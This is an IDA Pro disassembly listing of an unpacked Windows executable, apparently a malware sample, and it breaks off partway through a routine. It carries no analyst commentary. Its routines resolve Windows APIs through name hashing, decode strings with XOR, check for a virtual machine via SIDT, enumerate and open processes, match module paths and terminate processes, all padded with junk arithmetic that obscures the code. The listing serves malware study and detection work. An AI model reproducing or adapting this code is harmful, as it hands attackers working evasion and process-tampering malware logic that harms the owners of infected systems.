;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : F0CC8D7F947184715E63F70D0979339D
; File Name : u:\work\f0cc8d7f947184715e63f70d0979339d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40102E+28�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
lea ecx, [esi-1]
test ecx, ecx
push 2
pop eax
jz short loc_401015
loc_40100F: ; CODE XREF: sub_401000+13�j
imul eax, eax
dec ecx
jnz short loc_40100F
loc_401015: ; CODE XREF: sub_401000+D�j
movzx edx, [esp+4+arg_0]
push 8
pop ecx
sub ecx, esi
dec eax
shl eax, cl
and eax, edx
sar eax, cl
mov ecx, esi
shl edx, cl
pop esi
or eax, edx
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40102E proc near ; CODE XREF: sub_401117:loc_401152�p
; sub_4015DC+2E4�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push 100h
xor esi, esi
push esi
push edi
call sub_4010BB
add esp, 0Ch
cmp [esp+8+arg_8], esi
jle short loc_40106B
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_401050: ; CODE XREF: sub_40102E+3A�j
movzx eax, byte ptr [ebx]
push 1
push eax
call sub_401000
xor al, 0C5h
inc ebx
mov [esi+edi], al
inc esi
cmp esi, [esp+14h+arg_8]
pop ecx
pop ecx
jl short loc_401050
pop ebx
loc_40106B: ; CODE XREF: sub_40102E+1B�j
mov byte ptr [esi+edi], 0
pop edi
pop esi
retn
sub_40102E endp
; =============== S U B R O U T I N E =======================================
sub_401072 proc near ; CODE XREF: sub_401117:loc_4011B5�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_401087
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_401090
; ---------------------------------------------------------------------------
loc_401087: ; CODE XREF: sub_401072+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_401090: ; CODE XREF: sub_401072+13�j
pop esi
retn
sub_401072 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401094 proc near ; CODE XREF: sub_4020E2+29F�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_4010B5
mov [ebp+var_1], 1
loc_4010B5: ; CODE XREF: sub_401094+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401094 endp
; =============== S U B R O U T I N E =======================================
sub_4010BB proc near ; CODE XREF: sub_40102E+F�p
; sub_4015DC+15A�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010E9
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010E9: ; CODE XREF: sub_4010BB+6�j
mov eax, [esp+arg_0]
retn
sub_4010BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010EE proc near ; CODE XREF: sub_402A7F+2C1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_40110E
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010FF: ; CODE XREF: sub_4010EE+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010FF
loc_40110E: ; CODE XREF: sub_4010EE+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
sub_401113 proc near ; CODE XREF: sub_402A7F+2C�p
mov eax, [esp+0]
retn
sub_401113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401117 proc near ; CODE XREF: sub_401117+46�p
; sub_4013F5+94�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
sub esp, 0Ch
dec eax
push esi
push edi
push 1
pop edi
jz loc_4011B5
dec eax
jz short loc_4011A6
dec eax
jz short loc_401197
dec eax
jz short loc_401188
dec eax
jz short loc_401179
dec eax
jz short loc_40116A
dec eax
jz short loc_401145
loc_40113E: ; CODE XREF: sub_401117+254�j
xor eax, eax
jmp loc_4013B0
; ---------------------------------------------------------------------------
loc_401145: ; CODE XREF: sub_401117+25�j
push 0Bh
mov esi, offset dword_405208
push esi
push offset dword_40405C
loc_401152: ; CODE XREF: sub_401117+60�j
; sub_401117+6F�j ...
call sub_40102E
push 0C8AC8026h
push edi
call sub_401117
add esp, 14h
push esi
call eax
jmp short loc_4011BA
; ---------------------------------------------------------------------------
loc_40116A: ; CODE XREF: sub_401117+22�j
push 0Ch
mov esi, offset dword_405208
push esi
push offset dword_40404C
jmp short loc_401152
; ---------------------------------------------------------------------------
loc_401179: ; CODE XREF: sub_401117+1F�j
push 9
mov esi, offset dword_405208
push esi
push offset loc_404040
jmp short loc_401152
; ---------------------------------------------------------------------------
loc_401188: ; CODE XREF: sub_401117+1C�j
push 0Bh
mov esi, offset dword_405208
push esi
push (offset loc_404033+1)
jmp short loc_401152
; ---------------------------------------------------------------------------
loc_401197: ; CODE XREF: sub_401117+19�j
push 0Ah
mov esi, offset dword_405208
push esi
push offset loc_404028
jmp short loc_401152
; ---------------------------------------------------------------------------
loc_4011A6: ; CODE XREF: sub_401117+16�j
push 0Bh
mov esi, offset dword_405208
push esi
push offset byte_40401C
jmp short loc_401152
; ---------------------------------------------------------------------------
loc_4011B5: ; CODE XREF: sub_401117+F�j
call sub_401072
loc_4011BA: ; CODE XREF: sub_401117+51�j
cmp dword_405104, 0A7h
mov [ebp+arg_0], eax
jge short loc_4011CF
inc dword_405104
loc_4011CF: ; CODE XREF: sub_401117+B0�j
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
push 60h
lea eax, [ecx+eax+18h]
pop ecx
push 8
pop edx
loc_4011DF: ; CODE XREF: sub_401117+DB�j
cmp edx, 7Eh
ja short loc_4011E6
inc ecx
inc edx
loc_4011E6: ; CODE XREF: sub_401117+CB�j
add ecx, 2Ch
add edx, 2Ch
cmp ecx, 9Bh
jl short loc_4011DF
push 57h
mov dword_405104, ecx
mov edx, [eax+60h]
add edx, [ebp+arg_0]
pop ecx
push 48h
pop eax
loc_401206: ; CODE XREF: sub_401117+104�j
cmp eax, 0E2h
ja short loc_40120F
inc ecx
inc eax
loc_40120F: ; CODE XREF: sub_401117+F4�j
add ecx, 12h
add eax, 12h
cmp ecx, 0ADh
jl short loc_401206
mov eax, [ebp+arg_4]
shr eax, 10h
test ax, ax
mov dword_405104, ecx
jnz short loc_40123A
movzx esi, word ptr [ebp+arg_4]
sub esi, [edx+10h]
jmp loc_401374
; ---------------------------------------------------------------------------
loc_40123A: ; CODE XREF: sub_401117+115�j
cmp ecx, 39h
jge short loc_401246
inc ecx
mov dword_405104, ecx
loc_401246: ; CODE XREF: sub_401117+126�j
mov edi, [edx+20h]
add edi, [ebp+arg_0]
lea eax, [ecx-12h]
cmp eax, 0C5h
ja short loc_40125D
inc ecx
mov dword_405104, ecx
loc_40125D: ; CODE XREF: sub_401117+13D�j
mov eax, [edx+24h]
add eax, [ebp+arg_0]
and [ebp+var_8], 0
cmp dword ptr [edx+18h], 0
push ebx
jbe loc_401344
loc_401272: ; CODE XREF: sub_401117+227�j
mov esi, [edi]
add esi, [ebp+arg_0]
and [ebp+var_C], 0
cmp ecx, 6
jl short loc_401287
inc ecx
mov dword_405104, ecx
loc_401287: ; CODE XREF: sub_401117+167�j
cmp ecx, 0EBh
jle short loc_401298
push 25h
pop ecx
mov dword_405104, ecx
loc_401298: ; CODE XREF: sub_401117+176�j
lea ebx, [ecx-3]
cmp ebx, 0DBh
mov [ebp+var_4], esi
ja short loc_4012AD
inc ecx
mov dword_405104, ecx
loc_4012AD: ; CODE XREF: sub_401117+18D�j
cmp byte ptr [esi], 0
mov esi, [ebp+var_C]
jz short loc_401318
loc_4012B5: ; CODE XREF: sub_401117+1FF�j
cmp ecx, 9
jl short loc_4012C1
inc ecx
mov dword_405104, ecx
loc_4012C1: ; CODE XREF: sub_401117+1A1�j
cmp ecx, 0C8h
jle short loc_4012D2
push 24h
pop ecx
mov dword_405104, ecx
loc_4012D2: ; CODE XREF: sub_401117+1B0�j
lea ebx, [ecx-30h]
rol esi, 7
cmp ebx, 99h
ja short loc_4012E7
inc ecx
mov dword_405104, ecx
loc_4012E7: ; CODE XREF: sub_401117+1C7�j
mov ebx, [ebp+var_4]
movsx ebx, byte ptr [ebx]
xor esi, ebx
cmp ecx, 55h
jge short loc_4012FB
inc ecx
mov dword_405104, ecx
loc_4012FB: ; CODE XREF: sub_401117+1DB�j
inc [ebp+var_4]
lea ebx, [ecx-34h]
cmp ebx, 0A9h
ja short loc_401310
inc ecx
mov dword_405104, ecx
loc_401310: ; CODE XREF: sub_401117+1F0�j
mov ebx, [ebp+var_4]
cmp byte ptr [ebx], 0
jnz short loc_4012B5
loc_401318: ; CODE XREF: sub_401117+19C�j
cmp ecx, 82h
jge short loc_401327
inc ecx
mov dword_405104, ecx
loc_401327: ; CODE XREF: sub_401117+207�j
cmp esi, [ebp+arg_4]
jz loc_4013B4
inc [ebp+var_8]
mov esi, [ebp+var_8]
add edi, 4
inc eax
inc eax
cmp esi, [edx+18h]
jb loc_401272
loc_401344: ; CODE XREF: sub_401117+155�j
mov esi, [ebp+arg_0]
loc_401347: ; CODE XREF: sub_401117+2CC�j
; sub_401117+2D9�j
cmp ecx, 11h
pop ebx
jl short loc_401354
inc ecx
mov dword_405104, ecx
loc_401354: ; CODE XREF: sub_401117+234�j
cmp ecx, 0B3h
jle short loc_401365
push 1Dh
pop ecx
mov dword_405104, ecx
loc_401365: ; CODE XREF: sub_401117+243�j
mov eax, [ebp+var_8]
cmp eax, [edx+18h]
jz loc_40113E
xor edi, edi
inc edi
loc_401374: ; CODE XREF: sub_401117+11E�j
cmp ecx, edi
jl short loc_40137F
inc ecx
mov dword_405104, ecx
loc_40137F: ; CODE XREF: sub_401117+25F�j
cmp ecx, 0A6h
jle short loc_401390
push 1Ch
pop ecx
mov dword_405104, ecx
loc_401390: ; CODE XREF: sub_401117+26E�j
mov eax, [edx+1Ch]
mov edx, [ebp+arg_0]
lea eax, [eax+esi*4]
mov eax, [eax+edx]
lea esi, [ecx-4Eh]
cmp esi, 9Ah
ja short loc_4013AE
inc ecx
mov dword_405104, ecx
loc_4013AE: ; CODE XREF: sub_401117+28E�j
add eax, edx
loc_4013B0: ; CODE XREF: sub_401117+29�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4013B4: ; CODE XREF: sub_401117+213�j
push 11h
pop ecx
push 0FFFFFFDAh
pop esi
loc_4013BA: ; CODE XREF: sub_401117+2B9�j
cmp esi, 0B6h
ja short loc_4013C4
inc ecx
inc esi
loc_4013C4: ; CODE XREF: sub_401117+2A9�j
add ecx, 0Eh
add esi, 0Eh
cmp ecx, 8Ch
jl short loc_4013BA
mov dword_405104, ecx
movzx esi, word ptr [eax]
lea eax, [ecx-3Dh]
cmp eax, 0A3h
ja loc_401347
inc ecx
mov dword_405104, ecx
jmp loc_401347
sub_401117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013F5 proc near ; CODE XREF: UPX0:loc_4032D3�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
cmp byte_405409, 0
jz short loc_40140E
mov al, byte_405408
leave
retn
; ---------------------------------------------------------------------------
loc_40140E: ; CODE XREF: sub_4013F5+10�j
mov eax, dword_405104
cmp eax, 2
jl short loc_40141E
inc eax
mov dword_405104, eax
loc_40141E: ; CODE XREF: sub_4013F5+21�j
mov ecx, 0EBh
cmp eax, ecx
jle short loc_40142F
push 14h
pop eax
mov dword_405104, eax
loc_40142F: ; CODE XREF: sub_4013F5+30�j
cmp eax, 1
mov byte_405409, 1
jl short loc_401441
inc eax
mov dword_405104, eax
loc_401441: ; CODE XREF: sub_4013F5+44�j
cmp eax, 0ECh
jle short loc_401450
push 1Ch
pop eax
mov dword_405104, eax
loc_401450: ; CODE XREF: sub_4013F5+51�j
cmp eax, 12h
jl short loc_40145B
inc eax
mov dword_405104, eax
loc_40145B: ; CODE XREF: sub_4013F5+5E�j
cmp eax, ecx
jle short loc_401467
push 1Ch
pop eax
mov dword_405104, eax
loc_401467: ; CODE XREF: sub_4013F5+68�j
lea ecx, [eax-26h]
cmp ecx, 0B2h
mov [ebp+var_94], 94h
ja short loc_401482
inc eax
mov dword_405104, eax
loc_401482: ; CODE XREF: sub_4013F5+85�j
push 9C480E24h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
mov ecx, dword_405104
lea eax, [ecx-52h]
cmp eax, 9Bh
ja short loc_4014B0
inc ecx
mov dword_405104, ecx
loc_4014B0: ; CODE XREF: sub_4013F5+B2�j
cmp [ebp+var_84], 2
lea edx, [ecx-26h]
setz al
cmp edx, 0C2h
mov byte_405408, al
ja short locret_4014D1
inc ecx
mov dword_405104, ecx
locret_4014D1: ; CODE XREF: sub_4013F5+D3�j
leave
retn
sub_4013F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014D3 proc near ; CODE XREF: sub_4015DC+342�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword_405104
add eax, 0FFFFFFC1h
cmp eax, 0AEh
ja short loc_4014EC
inc dword_405104
loc_4014EC: ; CODE XREF: sub_4014D3+11�j
push ebx
push esi
xor esi, esi
inc esi
cmp [ebp+arg_0], 0
push edi
jz loc_4015C4
mov edi, 99A4299Dh
push edi
push esi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push esi
push esi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_401544
push 0FDC94385h
push esi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov edi, [ebp+var_4]
push 9E6FA842h
push esi
call sub_401117
pop ecx
pop ecx
push edi
push ebx
call eax
jmp loc_4015C7
; ---------------------------------------------------------------------------
loc_401544: ; CODE XREF: sub_4014D3+42�j
push edi
push esi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push esi
call eax
cmp dword_405104, esi
mov ebx, eax
jl short loc_401565
inc dword_405104
loc_401565: ; CODE XREF: sub_4014D3+8A�j
cmp dword_405104, 0E3h
jle short loc_40157B
mov dword_405104, 19h
loc_40157B: ; CODE XREF: sub_4014D3+9C�j
push 9E6FA842h
push esi
call sub_401117
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
cmp dword_405104, 0Eh
jl short loc_40159C
inc dword_405104
loc_40159C: ; CODE XREF: sub_4014D3+C1�j
cmp dword_405104, 0EDh
jle short loc_4015B2
mov dword_405104, 15h
loc_4015B2: ; CODE XREF: sub_4014D3+D3�j
push 723EB0D5h
push esi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
jmp short loc_4015C7
; ---------------------------------------------------------------------------
loc_4015C4: ; CODE XREF: sub_4014D3+23�j
mov ebx, [ebp+arg_0]
loc_4015C7: ; CODE XREF: sub_4014D3+6C�j
; sub_4014D3+EF�j
push 723EB0D5h
push esi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_4014D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015DC proc near ; CODE XREF: UPX0:004032E5�p
; UPX0:004033AB�p ...
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_4036A0
mov eax, dword_405104
cmp eax, 5
jl short loc_4015F9
inc eax
mov dword_405104, eax
loc_4015F9: ; CODE XREF: sub_4015DC+15�j
cmp eax, 0BCh
jle short loc_401608
push 27h
pop eax
mov dword_405104, eax
loc_401608: ; CODE XREF: sub_4015DC+22�j
cmp eax, 4
jl short loc_401613
inc eax
mov dword_405104, eax
loc_401613: ; CODE XREF: sub_4015DC+2F�j
cmp eax, 0F1h
jle short loc_401622
push 16h
pop eax
mov dword_405104, eax
loc_401622: ; CODE XREF: sub_4015DC+3C�j
lea ecx, [eax-2Ah]
cmp ecx, 0A6h
ja short loc_401633
inc eax
mov dword_405104, eax
loc_401633: ; CODE XREF: sub_4015DC+4F�j
push 774393E8h
push 1
call sub_401117
pop ecx
pop ecx
push 100h
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
push 46h
pop eax
push 9
pop ecx
loc_401657: ; CODE XREF: sub_4015DC+8E�j
cmp ecx, 0ABh
ja short loc_401661
inc eax
inc ecx
loc_401661: ; CODE XREF: sub_4015DC+81�j
add eax, 21h
add ecx, 21h
cmp eax, 7Ah
jl short loc_401657
push ebx
push esi
push edi
push 8AC4909Bh
push 5
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_4019F5
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
jbe loc_4019F5
mov ebx, offset dword_405208
loc_4016B2: ; CODE XREF: sub_4015DC+413�j
mov edi, [ebp+var_4]
lea edi, [ebp+edi*4+var_1318]
mov esi, [edi]
test esi, esi
jz loc_4019E3
cmp dword_405104, 0Bh
jl short loc_4016D5
inc dword_405104
loc_4016D5: ; CODE XREF: sub_4015DC+F1�j
cmp dword_405104, 0B9h
jle short loc_4016EB
mov dword_405104, 15h
loc_4016EB: ; CODE XREF: sub_4015DC+103�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push 4Bh
mov [ebp+var_8], eax
pop eax
push 3Dh
pop ecx
loc_40170D: ; CODE XREF: sub_4015DC+146�j
cmp ecx, 0C3h
ja short loc_401717
inc eax
inc ecx
loc_401717: ; CODE XREF: sub_4015DC+137�j
add eax, 0Bh
add ecx, 0Bh
cmp eax, 0B3h
jl short loc_40170D
push 100h
mov dword_405104, eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_4019D0
push 189F16C9h
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_4019D0
mov eax, dword_405104
add eax, 0FFFFFFE7h
cmp eax, 0CCh
ja short loc_401781
inc dword_405104
loc_401781: ; CODE XREF: sub_4015DC+19D�j
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_401117
pop ecx
pop ecx
push 100h
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
cmp dword_405104, 3
jl short loc_4017B3
inc dword_405104
loc_4017B3: ; CODE XREF: sub_4015DC+1CF�j
cmp dword_405104, 0DDh
jle short loc_4017C9
mov dword_405104, 16h
loc_4017C9: ; CODE XREF: sub_4015DC+1E1�j
mov esi, dword_404008
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_4019D0
cmp [ebp+var_117], 3Ah
jnz loc_4019D0
cmp [ebp+var_116], 5Ch
jnz loc_4019D0
mov eax, dword_405104
add eax, 0FFFFFFAAh
cmp eax, 73h
ja short loc_40180D
inc dword_405104
loc_40180D: ; CODE XREF: sub_4015DC+229�j
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
mov eax, dword_405104
add eax, 0FFFFFFB5h
cmp eax, 0A5h
ja short loc_401830
inc dword_405104
jmp short loc_401830
; ---------------------------------------------------------------------------
loc_40182F: ; CODE XREF: sub_4015DC+25C�j
dec esi
loc_401830: ; CODE XREF: sub_4015DC+249�j
; sub_4015DC+251�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_40182F
push [ebp+arg_0]
call dword_404008 ; lstrlen
test eax, eax
jle short loc_401898
push 51h
pop eax
push 0Dh
pop ecx
loc_40184D: ; CODE XREF: sub_4015DC+284�j
cmp ecx, 8Bh
ja short loc_401857
inc eax
inc ecx
loc_401857: ; CODE XREF: sub_4015DC+277�j
add eax, 19h
add ecx, 19h
cmp eax, 6Fh
jl short loc_40184D
push [ebp+arg_0]
mov dword_405104, eax
lea eax, [ebp+esi+var_117]
push eax
call dword_404004 ; lstrcmpi
test eax, eax
jz loc_4019FC
cmp dword_405104, 44h
jge loc_4019D0
inc dword_405104
jmp loc_4019D0
; ---------------------------------------------------------------------------
loc_401898: ; CODE XREF: sub_4015DC+269�j
push 10h
pop eax
push 0FFFFFFB1h
pop ecx
loc_40189E: ; CODE XREF: sub_4015DC+2D5�j
cmp ecx, 88h
ja short loc_4018A8
inc eax
inc ecx
loc_4018A8: ; CODE XREF: sub_4015DC+2C8�j
add eax, 12h
add ecx, 12h
cmp eax, 70h
jl short loc_40189E
push 0Bh
push ebx
push offset dword_40406C
mov dword_405104, eax
call sub_40102E
push 8A94F707h
push 7
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_4019D0
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_404004 ; lstrcmpi
test eax, eax
jz loc_4019D0
push ebx
lea eax, [ebp+esi+var_117]
push eax
call dword_404004 ; lstrcmpi
test eax, eax
jz loc_4019D0
push dword ptr [edi]
call sub_4014D3
pop ecx
push 0Bh
pop eax
push 0FFFFFFE5h
pop ecx
loc_40192A: ; CODE XREF: sub_4015DC+363�j
cmp ecx, 0B4h
ja short loc_401934
inc eax
inc ecx
loc_401934: ; CODE XREF: sub_4015DC+354�j
add eax, 18h
add ecx, 18h
cmp eax, 9Eh
jl short loc_40192A
mov dword_405104, eax
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_404000 ; lstrcpy
push 1
push ebx
push offset dword_404068
call sub_40102E
add esp, 0Ch
push ebx
lea eax, [ebp+var_218]
push eax
call dword_40400C ; lstrcat
mov eax, dword_405104
add eax, 0FFFFFFD8h
cmp eax, 0B5h
ja short loc_40198D
inc dword_405104
loc_40198D: ; CODE XREF: sub_4015DC+3A9�j
push 20E4E9EDh
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
cmp dword_405104, 0Ah
jl short loc_4019BA
inc dword_405104
loc_4019BA: ; CODE XREF: sub_4015DC+3D6�j
cmp dword_405104, 0A8h
jle short loc_4019D0
mov dword_405104, 18h
loc_4019D0: ; CODE XREF: sub_4015DC+165�j
; sub_4015DC+18A�j ...
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_4019E3: ; CODE XREF: sub_4015DC+E4�j
mov eax, [ebp+var_C]
inc [ebp+var_4]
shr eax, 2
cmp [ebp+var_4], eax
jb loc_4016B2
loc_4019F5: ; CODE XREF: sub_4015DC+BA�j
; sub_4015DC+CB�j
xor eax, eax
loc_4019F7: ; CODE XREF: sub_4015DC+42A�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4019FC: ; CODE XREF: sub_4015DC+29E�j
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp short loc_4019F7
sub_4015DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A08 proc near ; CODE XREF: sub_4020E2+325�p
; sub_4020E2+3A1�p ...
var_87C = byte ptr -87Ch
var_47C = byte ptr -47Ch
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 87Ch
push ebx
push esi
push edi
push 3Dh
pop eax
push 0FFFFFFE4h
pop ecx
xor ebx, ebx
push 11h
mov [ebp+var_4], ebx
mov [ebp+var_18], ebx
mov [ebp+var_1C], 7D0h
pop edi
loc_401A2C: ; CODE XREF: sub_401A08+35�j
cmp ecx, 83h
ja short loc_401A36
inc eax
inc ecx
loc_401A36: ; CODE XREF: sub_401A08+2A�j
add eax, edi
add ecx, edi
cmp eax, 67h
jl short loc_401A2C
mov esi, 400h
push esi
mov dword_405104, eax
lea eax, [ebp+var_87C]
push ebx
push eax
call sub_4010BB
push 534D481h
push 3
mov [ebp+var_14], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_14]
push ecx
lea ecx, [ebp+var_87C]
push ecx
push ebx
call eax
push 5
mov esi, offset dword_405208
push esi
push offset dword_404078
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_87C]
push eax
call dword_40400C ; lstrcat
push 4Bh
pop esi
push 0FFFFFFF3h
pop eax
loc_401AA0: ; CODE XREF: sub_401A08+A9�j
cmp eax, 7Eh
ja short loc_401AA7
inc esi
inc eax
loc_401AA7: ; CODE XREF: sub_401A08+9B�j
add esi, edi
add eax, edi
cmp esi, 82h
jl short loc_401AA0
lea eax, [esi-62h]
cmp eax, 81h
mov dword_405104, esi
mov [ebp+var_8], ebx
ja short loc_401ACD
inc esi
mov dword_405104, esi
loc_401ACD: ; CODE XREF: sub_401A08+BC�j
push 4
pop edi
loc_401AD0: ; CODE XREF: sub_401A08+608�j
push 400h
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
add esp, 0Ch
cmp esi, 0Ch
mov [ebp+var_14], 400h
jl short loc_401AF8
inc esi
mov dword_405104, esi
loc_401AF8: ; CODE XREF: sub_401A08+E7�j
cmp esi, 0CDh
jle short loc_401B09
push 1Ch
pop esi
mov dword_405104, esi
loc_401B09: ; CODE XREF: sub_401A08+F6�j
cmp [ebp+arg_C], bl
jz short loc_401B61
cmp esi, 6
jl short loc_401B1A
inc esi
mov dword_405104, esi
loc_401B1A: ; CODE XREF: sub_401A08+109�j
cmp esi, 0D5h
jle short loc_401B2C
mov dword_405104, 23h
loc_401B2C: ; CODE XREF: sub_401A08+118�j
cmp [ebp+var_8], ebx
lea eax, [ebp+var_47C]
jnz short loc_401B3E
push offset dword_405108
jmp short loc_401B43
; ---------------------------------------------------------------------------
loc_401B3E: ; CODE XREF: sub_401A08+12D�j
push offset dword_405308
loc_401B43: ; CODE XREF: sub_401A08+134�j
push eax
call dword_404000 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_47C]
push eax
call dword_40400C ; lstrcat
mov eax, dword_405104
jmp short loc_401BD2
; ---------------------------------------------------------------------------
loc_401B61: ; CODE XREF: sub_401A08+104�j
lea eax, [esi-43h]
cmp eax, 8Ah
ja short loc_401B72
inc esi
mov dword_405104, esi
loc_401B72: ; CODE XREF: sub_401A08+161�j
push offset dword_405308
lea eax, [ebp+var_47C]
push eax
call dword_404000 ; lstrcpy
mov eax, dword_405104
add eax, 0FFFFFFB1h
cmp eax, 0A9h
ja short loc_401B99
inc dword_405104
loc_401B99: ; CODE XREF: sub_401A08+189�j
push [ebp+arg_0]
lea eax, [ebp+var_47C]
push eax
call dword_40400C ; lstrcat
push 18h
pop eax
push 12h
pop ecx
loc_401BAF: ; CODE XREF: sub_401A08+1BC�j
cmp ecx, 0D8h
ja short loc_401BB9
inc eax
inc ecx
